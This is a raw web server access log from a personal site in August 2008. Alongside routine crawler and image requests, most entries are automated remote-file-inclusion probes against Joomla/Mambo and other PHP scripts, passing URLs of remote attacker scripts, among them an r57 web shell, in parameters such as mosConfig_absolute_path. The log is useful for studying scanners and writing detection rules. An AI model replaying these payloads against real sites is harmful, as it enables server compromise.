216.120.234.168 - - [28/Aug/2008:10:56:18 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:56:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0173.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.6.18.216 - - [28/Aug/2008:10:56:31 -0700] "GET /bikes/dteel/EQ2/Screenshots/?D=D HTTP/1.0" 200 7100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:56:39 -0700] "GET /logs/access_080510.log//components/com_flyspray/startdown.php?file=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:56:44 -0700] "GET /logs/access_080122.log/errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.184.180 - - [28/Aug/2008:10:57:24 -0700] "GET //poll/png.php?include_path=http://titureddo.altervista.org/vacanze/pinogino.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
89.111.184.180 - - [28/Aug/2008:10:57:24 -0700] "GET /logs//poll/png.php?include_path=http://titureddo.altervista.org/vacanze/pinogino.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:57:41 -0700] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:57:41 -0700] "GET /logs/access_080710.log//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.38.88 - - [28/Aug/2008:10:57:42 -0700] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 200 85471 "-" "libwww-perl/5.811" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:57:47 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0054.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:58:05 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:58:06 -0700] "GET //?path%5Bdocroot%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 200 85131 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:58:09 -0700] "GET /logs//?path%5Bdocroot%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 200 62576 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:58:18 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:58:26 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:58:48 -0700] "GET /logs/access_080401.log/errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:58:48 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:58:48 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:10:59:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_28/?M=A HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:59:19 -0700] "GET /logs/access_080511.log/errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:59:23 -0700] "GET /logs/access_080222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:59:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:10:59:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:10:59:25 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:10:59:25 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:59:41 -0700] "GET /logs/atom.php5?page=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:59:42 -0700] "GET /atom.php5?page=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:59:45 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:59:45 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:59:48 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.133.193.34 - - [28/Aug/2008:10:59:48 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:59:49 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.133.193.34 - - [28/Aug/2008:10:59:49 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:59:51 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:59:51 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:59:52 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:59:52 -0700] "GET /errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:59:52 -0700] "GET /logs/errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:00:13 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:00:16 -0700] "GET /logs/access_080512.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:00:27 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:11:00:37 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.120.78.96 - - [28/Aug/2008:11:00:42 -0700] "GET /logs//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.120.78.96 - - [28/Aug/2008:11:00:44 -0700] "GET //admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:11:00:45 -0700] "GET /logs/access_080628.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:11:00:45 -0700] "GET /logs/access_080503.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:11:00:45 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:11:00:46 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:11:00:48 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.43.35.133 - - [28/Aug/2008:11:00:56 -0700] "GET /logs/access_080305.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:01:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_3.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:01:52 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:02:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-027_2.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:02:15 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:02:15 -0700] "GET /SQuery/lib/gore.php?libpath=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:02:36 -0700] "GET /logs/access_070731.log HTTP/1.0" 200 34839 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:03:13 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_28/?M=D HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:03:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:03:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.120.78.96 - - [28/Aug/2008:11:04:26 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:11:04:38 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:11:04:39 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:11:04:39 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:04:43 -0700] "GET /logs/access_080821.log//cyberfolio/portfolio/msg/view.php?av=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:04:44 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:04:54 -0700] "GET /logs/access_080418.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:11:05:15 -0700] "GET /logs/access_080710.log//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:11:05:19 -0700] "GET //index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 200 85411 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.213.247 - - [28/Aug/2008:11:05:19 -0700] "GET /logs//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.120.78.96 - - [28/Aug/2008:11:05:31 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.22 - - [28/Aug/2008:11:05:50 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 6927 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:03 -0700] "GET /logs/access_080821.log//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:03 -0700] "GET /logs/access_080821.log//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:03 -0700] "GET /logs/access_080821.log//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:04 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:04 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:04 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:04 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:04 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:04 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:06 -0700] "GET /logs/access_080821.log//cyberfolio/portfolio/msg/view.php?av=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:06 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:06:07 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.133.193.34 - - [28/Aug/2008:11:06:13 -0700] "GET /logs/access_080610.log//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/untouchme/bot/safe.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:11:06:32 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:06:39 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0122.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:06:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0040.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
59.106.54.82 - - [28/Aug/2008:11:07:11 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:11:07:11 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:11:07:12 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:54 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:55 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:55 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:55 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:55 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:56 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:56 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:56 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:56 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85015 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:56 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:57 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:58 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:58 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:58 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:58 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:58 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:07:59 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:00 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:02 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:03 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85015 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.249.149 - - [28/Aug/2008:11:08:03 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:08:05 -0700] "GET /logs/access_080412.log/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:08:06 -0700] "GET /?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 85031 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:08:07 -0700] "GET /logs/?sourcedir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.65" "www.dmulk.com"
